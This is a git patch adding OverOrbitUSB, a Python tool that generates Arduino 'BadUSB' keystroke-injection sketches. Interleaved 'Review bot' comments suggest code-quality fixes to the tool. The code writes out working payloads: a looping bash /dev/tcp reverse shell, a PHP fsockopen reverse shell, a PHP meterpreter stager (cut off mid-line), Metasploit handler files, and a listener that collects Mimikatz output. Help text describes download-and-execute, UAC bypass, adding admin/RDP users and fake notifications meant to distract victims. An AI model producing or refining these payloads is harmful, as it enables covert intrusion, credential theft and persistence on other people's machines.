From 03160f37c47a6a28d4950a8b1680b6a0bb79b3a7 Mon Sep 17 00:00:00 2001
From: ChandraOrbit <31229540+ChandraOrbit@users.noreply.github.com>
Date: Tue, 22 Aug 2017 09:22:00 +0700
Subject: [PATCH] Add files via upload
---
 OverOrbitUSB.py | 50 ++
 Petunjuk.md | 47 ++
 coreUtils.py | 126 ++++
 helperCore.py | 194 ++++++
 nfoCore.py | 230 +++++++
 nixCore.py | 367 ++++++++++++
 osxCore.py | 366 ++++++++++++
 winCore.py | 1512 +++++++++++++++++++++++++++++++++++++++++++++++
 8 files changed, 2892 insertions(+)
 create mode 100644 OverOrbitUSB.py
 create mode 100644 Petunjuk.md
 create mode 100644 coreUtils.py
 create mode 100644 helperCore.py
 create mode 100644 nfoCore.py
 create mode 100644 nixCore.py
 create mode 100644 osxCore.py
 create mode 100644 winCore.py
diff --git a/OverOrbitUSB.py b/OverOrbitUSB.py
new file mode 100644
index 0000000..3933b01
--- /dev/null
+++ b/OverOrbitUSB.py
@@ -0,0 +1,50 @@
+#!/usr/bin/python
+#uses HID-Project.h from https://github.com/NicoHood/HID, can be installed from Arduino Library Manager
+
+import sys
+import argparse
+import os
+import subprocess
+import coreUtils
+import winCore
+import nixCore
+import osxCore
+import helperCore
+import nfoCore
+
+def mainMenu():
+
+ menu = {}
+ menu['0']="Info"
+ menu['1']="Windows Payloads"
+ menu['2']="OSX Payloads"
+ menu['3']="Linux Payloads"
+ menu['4']="Helper/Listener Functions"
+ menu['99']="Exit"
+
+ while True:
+ coreUtils.bannerMain()
+ options=menu.keys()
+ options.sort(key=int)
+ for entry in options:
+ print entry, menu[entry]
+
+ selection=raw_input("\nPlease Select: ")
+ if selection =='1':
+ winCore.WinMenu()
+ elif selection == '2':
+ osxCore.osxMenu()
+ elif selection == '3':
+ nixCore.LinuxMenu()
+ elif selection == '4':
+ helperCore.helperMenu()
+ elif selection == '0':
+ nfoCore.generalInfo()
+ elif selection == '99':
+ break
+ else:
+ print "\n\n***That is not a valid option!***\n\n"
+
+
+if __name__ == "__main__":
+ mainMenu()
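Review bot: In OverOrbitUSB.py's `mainMenu`, `options=menu.keys()` followed by `options.sort(key=int)` only works where `keys()` returns a list, i.e. Python 2, and it is redone on every pass of the `while True` loop although `menu` never changes. `for entry in sorted(menu, key=int):` gives the same order on either interpreter and drops the temporary; the same two lines recur in the helperCore.py, nixCore.py and osxCore.py menus of this commit. `sys`, `argparse`, `os` and `subprocess` are imported here but not used anywhere in this file.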
diff --git a/Petunjuk.md b/Petunjuk.md
new file mode 100644
index 0000000..6b921f6
--- /dev/null
+++ b/Petunjuk.md
@@ -0,0 +1,47 @@
+# OverOrbitUSB
+"I am an ordinary human who tries to see from the glasses of universality." -Chandra Orbit.
+
+###General Info
+OverOrbitUSB is a tool to generate sketches for Arduinos when used as an HID Attack. It was designed around devices with the ATMEGA32U4 chip, like the CJMCU-BEETLE, or the new LilyGo "BadUSB" devices popping up on ebay and aliexpress that look like USB sticks but contain an Arduino. I wrote this because the few other tools out there that do similar don't have as many customization options like the UAC Bypass options or the notification bubble options. I wanted to create something that could quickly generate a custom payload and that did not require anything extra to be install beyond the standard Python libraries and the Arduino IDE. I also wrote this to get better at Python. This is my first release of anything, so expect problems.
+
+###Requirements
+- An Arduino that supports keyboard emulation
+- Python 2.7 (Python 3 version in the process)
+- Arduino IDE: https://www.arduino.cc/en/Main/Software
+- NicoHood's HID: https://github.com/NicoHood/HID/ (This can be installed straight from the Arduino IDE from the menu: Sketch->.Include Library->manage Libraries and search for "HID-Project")
+
+###Use
+1. start by launching OverOrbitUSB.py
+2. Select the target's OS
+3. Select the specific payload
+4. Fill in the required settings
+5. Generate the .ino file
+6. Open the .ino file in the Arduino IDE
+7. Flash the sketch to your Arduino device
+
+###Notes
+
+1. After flashing the payload, the Arduino IDE will disconnect the Arduino, then it will automatically reconnect, and deliver the payload. Be ready for characters to suddenly be typed to the screen; I recommend having notepad or similar open and focused when you flash the sketch
+2. OverOrbitUSB currently drops the .ino file and the Metasploit .rc file in the working directory, so look for them there.
+3. For the UAC Bypass techniques, timing is key. Older devices will open the Terminal with Admin rights at a slower speed, and therefore you may need to adjust the delay() in the BypassUAC functions in the sketch
+4. This is just the beginning. Many more payloads, features, options and additions are coming.
+5. Please contribute if you have something to add.
+
+##Disclaimer
+Don't do anything illegal with this.
+Usage of OverOrbitUSB for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, provincial/state and federal laws. Developer assume NO liability and are NOT responsible for any misuse or damage caused by this program.
+
+"Don't be mean; we don't have to be mean, cuz, remember, no matter where you go, there you are." - Buckaroo Banzai
+
+##About me
+You can find me on : www.orbitsolusi.com
+
+##Thanks
+Thank you to my beautiful wife for putting up with my late nights while I worked on this, and her fantastic support she has always given me.
+
+###CHANGELOG
+
+v0.1
+- Added new payload that grabs the username and computername and sends it to a listener
+- customization options to the notification bubble.
+- Initial commit
diff --git a/coreUtils.py b/coreUtils.py
new file mode 100644
index 0000000..cf58d55
--- /dev/null
+++ b/coreUtils.py
@@ -0,0 +1,126 @@ +#!/usr/bin/python +#uses HID-Project.h from https://github.com/NicoHood/HID, can be installed from Arduino Library Manager + +import sys +import argparse +import os +import subprocess +import socket + +def bannerMain(): + + clearScreen() + banner = " ****************************************************************************\n" + banner += " * d8b d8 d8b *\n" + banner += " * 888 8P8 d8P 888 *\n" + banner += " * 88b d888888P 88b *\n" + banner += " * d8888b 88bd88b 888888b 88b 888 888 d8P d888b 888888b *\n" + banner += " * d8P 888 88P 88P 88b 88P 88P d88 88 88b 88P 88b *\n" + banner += " * 88b d88 d88 d88 d88 d88 88b 888 d88 88b d88 d88 *\n" + banner += " * 88888P d88 d888888P d88 88b 888P 88b 8888P d888888P *\n" + banner += " * *\n" + banner += " * ORBIT SOLUTIONS *\n" + banner += " * www.orbitsolusi.com *\n" + banner += " * *\n" + banner += " ****************************************************************************\n" + banner += "\n" + banner += " \"CREATE EXPLOIT UNTUK HACKING VIA USB\"" + banner += "\n" + print banner + +def clear(): + + os.system('clear') + +def clearScreen(): + + if sys.platform == "linux" or sys.platform == "linux2" or sys.platform == "darwin": + clear() + elif sys.platform == "win32": + cls() + +def cls(): + os.system('cls') + +def msfRCfile(IP,port,payload, fileName): + + buffer = "use exploit/multi/handler\n" + buffer += "set PAYLOAD " + payload + "\n" + buffer += "set LHOST " + IP + "\n" + buffer += "set LPORT " + port + "\n" + buffer += "set ExitOnSession false\n" + buffer += "set autorunscript migrate -f\n" + buffer += "exploit -j -z\n" + + fileName = checkRC(fileName) + file = open(fileName,'w') + file.write(buffer) + file.close() + + print "\n\nWrote Metasploit file " + fileName + +def checkIP(IPaddress): + try: + socket.inet_aton(IPaddress) + return True + except socket.error: + return False + +def FileCheck(fileName): + if os.path.exists(fileName): + overwrite = raw_input ("File " + fileName+ " already exists. 
Overwrite? Y/N: ") + if overwrite not in ('Y','y','yes','Yes','YES'): + return True + else: + return False + else: + return False + +def checkINO(fileName): + if not fileName.endswith('.ino'): + fileName = fileName + ".ino" + return fileName + +def checkRC(fileName): + if not fileName.endswith('.rc'): + fileName = fileName + ".rc" + return fileName + + +def getFileName(defaultFileName): + + fileExists = True + while fileExists == True: + fileName = raw_input("Please enter the name of the output file (if left blank the default \""+defaultFileName+"\"): ") + if fileName == "": + fileName = defaultFileName + fileExists = FileCheck(fileName) + fileName = checkINO(fileName) + return fileName + +def getRCFileName(defaultFileName): + + fileExists = True + while fileExists == True: + fileName = raw_input("Please enter the name of the Metasploit RC file (if left blank the default \""+defaultFileName+"\"): ") + if fileName == "": + fileName = defaultFileName + fileExists = FileCheck(fileName) + fileName = checkRC(fileName) + return fileName + + +def getBinary(URL): + binary = URL.split("/")[-1] + return binary + +def checkQuotes(string): + + if string.startswith('-enc') or string.startswith('-Enc'): + string = string.replace('"','') + elif string.startswith('"') and string.endswith('"'): + string = string.replace('"','\\\"') + else: + string = '\\\"' + string + '\\\"' + return string + diff --git a/helperCore.py b/helperCore.py new file mode 100644 index 0000000..62fa8bd --- /dev/null +++ b/helperCore.py 
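Review bot: In coreUtils.py, `getFileName` and `getRCFileName` run `FileCheck(fileName)` on the name as typed and only afterwards append the extension with `checkINO`/`checkRC`, so a name entered without its extension skips the overwrite prompt even when the suffixed file exists, and the later `open(fileName,'w')` truncates it. Normalising first, `fileName = checkINO(fileName)` before `fileExists = FileCheck(fileName)` (and `checkRC` likewise), makes the prompt test the file that will actually be written. Indentation is flattened on this page, so whether the extension call sits inside the loop cannot be read off, but the order of the two calls is the same either way. `msfRCfile` would also be safer writing through `with open(fileName, 'w') as rc:` so the handle is closed if the write raises.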
@@ -0,0 +1,194 @@ +import coreUtils +import socket +import os +def HelperBanner(): + + coreUtils.clearScreen() + print "********************************************************************************************" + print "* *" + print "* *" + print "* Helper Function *" + print "* These options open up various listeners for the payloads *" + print "* *" + print "********************************************************************************************" + print "\n" + + +def helperMenu(): + + menu = {} + menu['1']="Invoke-Mimikatz/Add Admin/UserName and PCname Listener" + menu['42']="Main Menu" + menu['99']= "Exit" + + while True: + HelperBanner() + options=menu.keys() + options.sort(key=int) + for entry in options: + print entry, menu[entry] + + selection=raw_input("\nPlease Select: ") + if selection =='1': + helperOption1() + elif selection == '2': + helperOption2() + elif selection == '42': + coreUtils.clearScreen() + break + elif selection == '99': + exit() + else: + print "\n\n***That is not a valid option!***\n\n" + +def printData(IPaddy,input, listener): + + i=1 + baseFileName = IPaddy + listener + fileName = baseFileName + ".txt" + while os.path.exists(fileName): + fileName = baseFileName +"("+str(i)+").txt" + i += 1 + + file = open(fileName,'w') + file.write(input) + file.close() + print "File " + fileName + " written\n" + +def listenerMode(): + + listener="" + + while True: + + coreUtils.clearScreen() + print "This menu will let you select which mode the listener will be on" + print "This option will decide the naming convention for the ouput files" + print "Please select 1 or 2, then select to return to the previous menu" + print "\n" + + menu = {} + menu['1'] = "Set listener to Mimikatz" + menu['2'] = "Set listener to Add Admin" + menu['3'] = "Set listener to UserName and Computer Name" + menu['42'] = "Back to previous menu" + menu['99'] = "Exit" + + options=menu.keys() + options.sort(key=int) + for entry in options: + print entry, menu[entry] + + 
print "\n\n" + + selection = raw_input("Please select a mode: ") + if selection == '1': + listener = "MimiKatz" + elif selection == '2': + listener = "addAdmin" + elif selection == '3': + listener = "userPCname" + elif selection == '42': + coreUtils.clearScreen() + break + elif selection == '99': + exit() + else: + print "\n\n***That is not a valid option!***\n\n" + + return listener + +def helperOption1(): + + done = False + looper = False + port="" + listener="" + + + while looper != True: + + coreUtils.clearScreen() + print "********************************************************************************************" + print "* *" + print "* Listner *" + print "* This helper listens on a specific port and write the relevant data to a file *" + print "* Options are: 1.Listening Port *" + print "* *" + print "********************************************************************************************" + print "\n" + + menu = {} + menu['1'] = "Set the listening port" + menu['2'] = "Set listener to mimikatz, Admin or User and PC Name mode" + menu['3'] = "Start the listener" + menu['42']= "Return to previous menu" + menu['99']= "Exit" + + options=menu.keys() + options.sort(key=int) + for entry in options: + print entry, menu[entry] + + print "\n\n" + if port != "": + print "Listening port this server set to -> " + port + if listener !="": + print "Listner Mode set to " + listener + " mode" + + selection=raw_input("\nPlease Select: ") + + if selection == '1': + port = raw_input("Please enter the listening port on this server: ") + elif selection == '2': + listener = listenerMode() + elif selection == '3': + if done == False: + print "\nYou have not set all the options" + raw_input("Press Enter to return to the menu and set all the options") + else: + looper = True + elif selection == '42': + coreUtils.clearScreen() + break + elif selection == '99': + exit() + else: + print "\n\n***That is not a valid option!***\n\n" + + if port != "" and listener != "": + done = True 
+ + if listener == 'MimiKatz': + fileExtention = '-mimiKatz' + elif listener == 'addAdmin': + fileExtention = '-addAdmin' + elif listener == 'userPCname': + fileExtention = '-userPCname' + + if done == True and looper == True: + + port = int(port) + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + server_address = ('', port) + sock.bind(server_address) + sock.listen(1) + while True: + try: + print "Listening for a connection..." + connection, client_address = sock.accept() + print 'connection from', client_address[0] + data = connection.recv(4096) + if not data: + print "no data from " , client_address[0] + connection.close() + break + else: + printData(client_address[0],data, fileExtention) + except KeyboardInterrupt: + if connection: + connection.close() + break + finally: + # Clean up the connection + connection.close() diff --git a/nfoCore.py b/nfoCore.py new file mode 100644 index 0000000..0707b6b --- /dev/null +++ b/nfoCore.py 
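Review bot: In helperCore.py's `helperOption1`, the accept loop reads `connection` in both the `except KeyboardInterrupt` branch and the `finally` block, but the name is first bound by `sock.accept()`; an interrupt while still waiting for the first peer therefore raises UnboundLocalError instead of exiting cleanly, and `sock` itself is never closed on any path. Setting `connection = None` before the `try` and guarding with `if connection is not None: connection.close()` fixes the first; closing `sock` once the loop ends fixes the second. The socket is bound to `('', port)`, i.e. every interface, and the first `recv(4096)` from any peer is written to a new file in the working directory, so the bind address deserves to be an explicit setting and `int(port)` needs a range check. `helperMenu` also dispatches `'2'` to `helperOption2()`, which this new file does not define.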
@@ -0,0 +1,230 @@
+import coreUtils
+
+def Win1info():
+ print "\n\n"
+ print "This payload will download a windows binary and execute it"
+ print "You are required to specify the full URL of the binary to be downloaded, including the file name"
+ print "As well as the other standard payload options (UACBypass, notification bubble, etc)"
+ print "Example URL input: http://192.168.1.111/badBinary.exe"
+ print "\n"
+ print "Depending on which UAC Bypass technique you use, the binary will be dropped in:"
+ print "1. The user's home folder"
+ print "2. \\Windows\\System32 is you use the visiable UAC Bypass technique"
+ print "3. \\Windows\\System32\\WindowsPowershell\\v1.0"
+ print "\n"
+ print "It is up to you to make sure it will get past AV, and to clean up after"
+ print "\n"
+ raw_input("Please press Enter to return to the previous screen")
+
+
+def Win2info():
+ print "\n\n"
+ print "This payload will download a powershell script and execute it"
+ print "\n"
+ print "You are required to specify the URL of the powershell to be downloaded, including the powershell script name"
+ print "As well as the other standard payload options (UACBypass, notification bubble, etc)"
+ print "Example URL input: http://192.168.1.111/maliciousPS.ps1"
+ print "\n"
+ print "The powershell script will run from memory"
+ print "\n"
+ raw_input("Please press Enter to return to the previous screen")
+
+def Win3info():
+ print "\n\n"
+ print "This payload will execute a powershell script that you provide"
+ print "\n"
+ print "You are required provide the powershell script contents, the payload will execute"
+ print "As well as the other standard payload options (UACBypass, notification bubble, etc)"
+ print "\n"
+ print "the payload will automatically add \"powershell -nop -w hidden\""
+ print "If you script is fully encoded (like Empire), please start it with -enc so it doesn't get wrapped with \" \" "
+ print "\n"
+ print "The powershell script will run from memory"
+ print "\n"
+ raw_input("Please press Enter to return to the previous screen")
+
+def Win4info():
+ print "\n\n"
+ print "This payload will type out a powershell script and execute it, creating a remote TCP Powershell prompt"
+ print "\n"
+ print "You are required to provide IP address and port the payload will connect back to"
+ print "As well as the other standard payload options (UACBypass, notification bubble, etc)"
+ print "\n"
+ print "The powershell script will run from memory"
+ print "\n"
+ raw_input("Please press Enter to return to the previous screen")
+
+def Win5info():
+ print "\n\n"
+ print "This payload will add a User, add it to the Admin group, and add it to the RDP group"
+ print "\n"
+ print "You are required to provide the username and password, and optional IP and port"
+ print "As well as the other standard payload options (UACBypass, notification bubble, etc)"
+ print "This payload will optionally send the username and password to a listener (future feature*) "
+ print "if you plan on attacking multiple machines"
+ print "\n"
+ print "***This payload does require Admin rights***"
+ print "\n"
+ raw_input("Please press Enter to return to the previous screen")
+
+def Win6info():
+ print "\n\n"
+ print "This payload will download Invote-Mimikatz.ps1 (by default from github) and execute it, then send the results to a listening server"
+ print "\n"
+ print "You are required to provide theIP address and port the output will be sent to"
+ print "As well as the other standard payload options (UACBypass, notification bubble, etc)"
+ print "\n"
+ print "***This payload does require Admin rights***"
+ print "Invoke-Mimikatz.ps1 will run from memory"
+ print "\n"
+ raw_input("Please press Enter to return to the previous screen")
+
+def Win7info():
+ print "\n\n"
+ print "This payload will add and entry to the host file in Windows"
+ print "\n"
+ print "You are required to provide the name and IP address to be entered into the host file"
+ print "As well as the other standard payload options (UACBypass, notification bubble, etc)"
+ print "\n"
+ print "***This payload does require Admin rights***"
+ print "\n"
+ raw_input("Please press Enter to return to the previous screen")
+
+def Win8info():
+ print "\n\n"
+ print "This payload will download a file and place it on the current user's Desktop"
+ print "\n"
+ print "You are required to specify the full URL of the file to be downloaded, including the file name"
+ print "As well as the other standard payload options (UACBypass, notification bubble, etc)"
+ print "Example URL input: http://192.168.1.111/SecretHrData.doc"
+ print "\n"
+ raw_input("Please press Enter to return to the previous screen")
+
+def Win9info():
+ print "\n\n"
+ print "This payload will type out a powershell script and execute it, creating a remote TCP CMD prompt"
+ print "\n"
+ print "You are required to provide IP address and port the payload will connect back to"
+ print "As well as the other standard payload options (UACBypass, notification bubble, etc)"
+ print "\n"
+ print "The powershell script will run from memory"
+ print "\n"
+ raw_input("Please press Enter to return to the previous screen")
+
+def Win10info():
+ print "\n\n"
+ print "This payload will type out a powershell script and execute it, creating reverse/meterpreter/https connection"
+ print "\n"
+ print "You are required to provide IP address and port the payload will connect back to"
+ print "As well as the other standard payload options (UACBypass, notification bubble, etc)"
+ print "\n"
+ print "The powershell script will run from memory"
+ print "\n"
+ raw_input("Please press Enter to return to the previous screen")
+
+def Win11info():
+ print "\n\n"
+ print "This payload will get the current user and computername and send it to a remote listener"
+ print "\n"
+ print "You are required to provide IP address and port the payload will send data back to"
+ print "As well as the other standard payload options (UACBypass, notification bubble, etc)"
+ print "\n"
+ print "The powershell script will run from memory"
+ print "\n"
+ raw_input("Please press Enter to return to the previous screen")
+
+def UACBypassInfo():
+ print "\n\n"
+ print "Option 2. UAC Bypass technique will download FuzzySecurity's bypass technique from github, and run it"
+ print "by default with the \"-Method ucmDismMethod\" argument, opening a Powershell prompt with Admin rights"
+ print "There is no popup, but network lag affects how long the prompt takes to appear, and drops the file"
+ print "\"dismcore.dll\" into the Windows\System32 folder"
+ print "\n"
+ print "Option 3. UAC Bypass technique will start a CMD Prompt from the Run Dialogue box with the RunAs argument"
+ print "After a delay, it will press Alt-Y to select Yes from Yes/No dialogue box that appears"
+ print "***This may get the user's attention***"
+ print "\n"
+ raw_input("Please press Enter to return to the previous screen")
+
+def bubbleInfo():
+ print "\n\n"
+ print "This option adds a notification bubble to popup from the system tray to distract the user"
+ print "by default the Title is \"Installing Drivers\" and the message is \"Please do not remove the device\""
+ print "\n"
+ raw_input("Please press Enter to return to the previous screen")
+ print "\n"
+
+def osx1info():
+ print "\n\n"
+ print "This payload will create a reverse TCP shell using netcat without the -e flag"
+ print "\n"
+ print "You are required to provide IP address and port the payload will connect back to"
+ print "\n"
+ print "This payload will run until the process is killed, so it will repeatedly attempt to connect to the IP you provide"
+ print "\n"
+ raw_input("Please press Enter to return to the previous screen")
+
+def osx2info():
+ print "\n\n"
+ print "This payload will create a reverse TCP shell using PHP"
+ print "\n"
+ print "You are required to provide IP address and port the payload will connect back to"
+ print "\n"
+ raw_input("Please press Enter to return to the previous screen")
+
+def osx3info():
+ print "\n\n"
+ print "This payload will create a reverse TCP meterpreter in PHP"
+ print "\n"
+ print "You are required to provide IP address and port the payload will connect back to"
+ print "\n"
+ print "\n"
+ raw_input("Please press Enter to return to the previous screen")
+
+def nix1info():
+ print "\n\n"
+ print "This payload will create a reverse TCP shell using netcat without the -e flag"
+ print "\n"
+ print "You are required to provide IP address and port the payload will connect back to"
+ print "\n"
+ print "This payload will run until the process is killed, so it will repeatedly attempt to connect to the IP you provide"
+ print "\n"
+ raw_input("Please press Enter to return to the previous screen")
+
+def nix2info():
+ print "\n\n"
+ print "This payload will create a reverse TCP shell using PHP"
+ print "\n"
+ print "You are required to provide IP address and port the payload will connect back to"
+ print "\n"
+ raw_input("Please press Enter to return to the previous screen")
+
+def nix3info():
+ print "\n\n"
+ print "This payload will create a reverse TCP meterpreter in PHP"
+ print "\n"
+ print "You are required to provide IP address and port the payload will connect back to"
+ print "\n"
+ print "\n"
+ raw_input("Please press Enter to return to the previous screen")
+
+
+
+def generalInfo():
+ coreUtils.clearScreen()
+ print "\n\n"
+ print "GENERAL"
+ print "OrbitUSB is designed to facilitate creating Arduino sketches for devices with the AtMega32U4 chipset"
+ print "That can do keyboard emulation. Once plugged into a system, the malicious device will type out the contents"
+ print "of the selected payload, which include download and execute binaries, custom powershell execution and more"
+ print "Options include notification bubbles from system tray to distract users as well as UAC Bypass techniques"
+ print "to get CMD prompts with elevated priveleges"
+ print "\nREQUIREMENTS"
+ print "This tool requires the HID-Project library for all Windows payloads"
+ print "Which can be installed within the Arduino IDE: Sketch->.Include Library->manage Libraries and search for \"HID-Project\""
+ print "\nABOUT ME"
+ print "You can find me on www.orbitsolusi.com"
+ print "and on github at https://github.com/OrbitUSB"
+ print "Thanks to: mywife for...alot"
+ print "\n"
+ raw_input("Please press Enter to return to the previous screen")
diff --git a/nixCore.py b/nixCore.py
new file mode 100644
index 0000000..3d30bc8
--- /dev/null
+++ b/nixCore.py
@@ -0,0 +1,367 @@ +#!/usr/bin/python +#uses HID-Project.h from https://github.com/NicoHood/HID, can be installed from Arduino Library Manager + +import sys +import argparse +import os +import subprocess +import coreUtils + +def nixBanner(): + + coreUtils.clearScreen() + print "********************************************************************************************" + print "* *" + print "* *" + print "* Linux Payloads *" + print "* These Payloads are made for linux, it's up to you to get a terminal open *" + print "* *" + print "********************************************************************************************" + print "\n" + +def LinuxMenu(): + + coreUtils.clearScreen() + menu = {} + menu['1']="Bash Reverse Shell without nc -e for Linux" + menu['2']="Reverse Shell in PHP for Linux" + menu['3']="meterpreter/reverse in PHP for Linux" + menu['42']="Main Menu" + menu['99']="Exit" + + while True: + nixBanner() + options=menu.keys() + options.sort(key=int) + for entry in options: + print entry, menu[entry] + + selection=raw_input("\nPlease Select: ") + if selection =='1': + nixOption1() + elif selection == '2': + nixOption2() + elif selection == '3': + nixOption3() + elif selection == '42': + coreUtils.clearScreen() + break + elif selection == '99': + exit() + else: + print "\n\n***That is not a valid option!***\n\n" + +def nixWriteFile(fileName,payloadFunc,payload): + + buffer = "#include \n" + buffer += "void setup() {\n" + buffer += " Keyboard.begin();\n" + buffer += " hurryUp();\n" + buffer += " killCaps();\n" + buffer += " delay(3000);\n" + + buffer += " " + payloadFunc + + buffer += " Keyboard.end();\n" + buffer += "}\n" + + buffer += "void pressEnter(){\n" + buffer += " Keyboard.press(KEY_RETURN);\n" + buffer += " delay(100);\n" + buffer += " Keyboard.release(KEY_RETURN);\n" + buffer += "}\n" + + buffer += "void hurryUp(){\n" + buffer += " boolean areWeThereYet = capsCheck();\n" + buffer += " while (areWeThereYet == capsCheck()){\n" + buffer += " 
hitCaps();\n" + buffer += " }\n" + buffer += " hitCaps();\n" + buffer += "}\n" + buffer += "\n" + + buffer += "boolean capsCheck(){\n" + buffer += " if (BootKeyboard.getLeds() & LED_CAPS_LOCK){\n" + buffer += " return true;\n" + buffer += " }\n" + buffer += " else{\n" + buffer += " return false;\n" + buffer += " }\n" + buffer += "}\n" + buffer += "\n" + + buffer += "void hitCaps(){\n" + buffer += " Keyboard.press(KEY_CAPS_LOCK);\n" + buffer += " delay(100);\n" + buffer += " Keyboard.release(KEY_CAPS_LOCK);\n" + buffer += "}\n" + buffer += "\n" + + buffer += "void killCaps(){\n" + buffer += " if (capsCheck())\n" + buffer += " {\n" + buffer += " hitCaps();\n" + buffer += " }\n" + buffer += "}\n" + buffer += "\n" + + buffer += payload + + buffer += "void loop()\n" + buffer += "{\n" + buffer += "}\n" + + fileName = coreUtils.checkINO(fileName) + file = open(fileName,'w') + file.write(buffer) + file.close() + +def NixOption1(): + + done = False + looper = False + remoteIP="" + remotePort="" + fileName="" + + while looper != True: + + coreUtils.clearScreen() + print "********************************************************************************************" + print "* *" + print "* Bash Reverse Shell without NetCat *" + print "* This payload will initiate a Bash reverse shell without Netcat *" + print "* Options are: 1. remote IP 2. 
Listening Port *" + print "* *" + print "********************************************************************************************" + print "\n" + + menu = {} + menu['0'] = "Info" + menu['1'] = "Set IP address of the remote server" + menu['2'] = "Set the listening port of the remote server" + menu['3'] = "Set Arduino sketch filename" + menu['4'] = "Write Arduino sketch" + menu['42']= "Return to previous menu" + menu['99']= "Exit" + + options=menu.keys() + options.sort(key=int) + for entry in options: + print entry, menu[entry] + + print "\n\n" + if remoteIP != "": + print "IP of the remote server set to -> " + remoteIP + if remotePort != "": + print "Listening port on the remote server set to -> " + remotePort + if fileName != "": + print "Arduino filename set to -> " + fileName + + selection=raw_input("\nPlease Select: ") + + if selection =='1': + remoteIP = raw_input("Please enter the IP address of the remote server to connect to: ") + elif selection == '2': + remotePort = raw_input("Please enter the listening port on the remote server:") + elif selection == '3': + fileName = coreUtils.getFileName('reverseCMD.ino') + elif selection == '4': + if done == False: + print "\nYou have not set all the options" + raw_input("Press Enter to return to the menu and set all the options") + else: + looper = True + elif selection == '42': + coreUtils.clearScreen() + break + elif selection == '99': + exit() + elif selection == '0': + nfoCore.nix1info() + else: + print "\n\n***That is not a valid option!***\n\n" + + if remoteIP != "" and remotePort != "" and fileName != "": + done = True + + if done == True and looper == True: + payload = "void ReverseShell(){\n" + payload += "Keyboard.println(\"nohup bash -c \\\"while true;do bash -i >& /dev/tcp/" +remoteIP+ "/" +remotePort+ " 0>&1 2>&1; sleep 1;done\\\" 1>/dev/null &\");\n" + payload += " pressEnter();\n" + payload += "}\n" + + payloadFunc = "ReverseShell();\n" + + nixWriteFile(fileName,payloadFunc, payload) + +def 
nixOption2(): + + done = False + looper = False + remoteIP="" + remotePort="" + fileName="" + + while looper != True: + + coreUtils.clearScreen() + print "********************************************************************************************" + print "* *" + print "* PHP Reverse Shell *" + print "* This payload will initiate a reverse shell via PHP, requires PHP *" + print "* Options are: 1. remote IP 2. Listening Port *" + print "* *" + print "********************************************************************************************" + print "\n" + + menu = {} + menu['0'] = "Info" + menu['1'] = "Set IP address of the remote server" + menu['2'] = "Set the listening port of the remote server" + menu['3'] = "Set Arduino sketch filename" + menu['4'] = "Write Arduino sketch" + menu['42']= "Return to previous menu" + menu['99']= "Exit" + + options=menu.keys() + options.sort(key=int) + for entry in options: + print entry, menu[entry] + + print "\n\n" + if remoteIP != "": + print "IP of the remote server set to -> " + remoteIP + if remotePort != "": + print "Listening port on the remote server set to -> " + remotePort + if fileName != "": + print "Arduino filename set to -> " + fileName + + selection=raw_input("\nPlease Select: ") + + if selection =='1': + remoteIP = raw_input("Please enter the IP address of the remote server to connect to: ") + elif selection == '2': + remotePort = raw_input("Please enter the listening port on the remote server:") + elif selection == '3': + fileName = coreUtils.getFileName('revShellPHP.ino') + elif selection == '4': + if done == False: + print "\nYou have not set all the options" + raw_input("Press Enter to return to the menu and set all the options") + else: + looper = True + elif selection == '42': + coreUtils.clearScreen() + break + elif selection == '99': + exit() + elif selection == '0': + nfoCore.nix2info() + else: + print "\n\n***That is not a valid option!***\n\n" + + if remoteIP != "" and remotePort != "" and fileName != 
"": + done = True + + if done == True and looper == True: + + payload = "void ReverseShell(){\n" + payload += "Keyboard.println(\"php -r '$sock=fsockopen(\\\""+remoteIP+"\\\","+remotePort+");exec(\\\"/bin/sh -i <&3 >&3 2>&3\\\");'\");\n" + payload += " pressEnter();\n" + payload += "}\n" + + payloadFunc = "ReverseShell();\n" + + nixWriteFile(fileName,payloadFunc, payload) + +def nixOption3(): + + done = False + looper = False + remoteIP="" + remotePort="" + fileName="" + RCfile="" + + while looper != True: + + coreUtils.clearScreen() + print "********************************************************************************************" + print "* *" + print "* PHP Meterpreter Reverse TCP *" + print "* This payload will initiate a meterpreter/reverse_tcp via PHP, requires PHP *" + print "* Options are: 1. remote IP 2. Listening Port *" + print "* *" + print "********************************************************************************************" + print "\n" + + menu = {} + menu['0'] = "Info" + menu['1'] = "Set IP address of the remote server" + menu['2'] = "Set the listening port of the remote server" + menu['3'] = "Set Arduino sketch filename" + menu['4'] = "Set Metasploit RC File name" + menu['5'] = "Write Arduino sketch" + menu['42']= "Return to previous menu" + menu['99']= "Exit" + + options=menu.keys() + options.sort(key=int) + for entry in options: + print entry, menu[entry] + + print "\n\n" + if remoteIP != "": + print "IP of the remote server set to -> " + remoteIP + if remotePort != "": + print "Listening port on the remote server set to -> " + remotePort + if RCfile != "": + print "Metasploit RC File name set to -> " + RCfile + if fileName != "": + print "Arduino filename set to -> " + fileName + + selection=raw_input("\nPlease Select: ") + + if selection =='1': + remoteIP = raw_input("Please enter the IP address of the remote server to connect to: ") + elif selection == '2': + remotePort = raw_input("Please enter the listening port on the remote 
server:") + elif selection == '3': + RCfile = coreUtils.getRCFileName('reverseMetPHP.rc') + elif selection == '4': + fileName = coreUtils.getFileName('reverseMetPHP.ino') + elif selection == '5': + if done == False: + print "\nYou have not set all the options" + raw_input("Press Enter to return to the menu and set all the options") + else: + looper = True + elif selection == '42': + coreUtils.clearScreen() + break + elif selection == '99': + exit() + elif selection == '0': + nfoCore.nix3info() + else: + print "\n\n***That is not a valid option!***\n\n" + + if remoteIP != "" and remotePort != "" and fileName != "" and RCfile !="": + done = True + + if done == True and looper == True: + payload = "void ReverseShell(){\n" + payload += "Keyboard.println(\"php -r 'error_reporting(0); $ip = \\\""+remoteIP+"\\\"; $port = "+remotePort+"; if (($f = \\\"stream_socket_client\\\") && is_callable($f)) { $s = $f(\\\"tcp://{$ip}:{$port}\\\");" + payload += " $s_type = \\\"stream\\\"; } elseif (($f = \\\"fsockopen\\\") && is_callable($f)) { $s = $f($ip, $port); $s_type = \\\"stream\\\"; } elseif (($f = \\\"socket_create\\\") && is_callable($f))" + payload += " { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = \\\"socket\\\"; } else { die(\\\"no socket funcs\\\"); } if (!$s) { die(\\\"no socket\\\");" + payload += " } switch ($s_type) { case \\\"stream\\\": $len = fread($s, 4); break; case \\\"socket\\\": $len = socket_read($s, 4); break; } if (!$len) { die(); 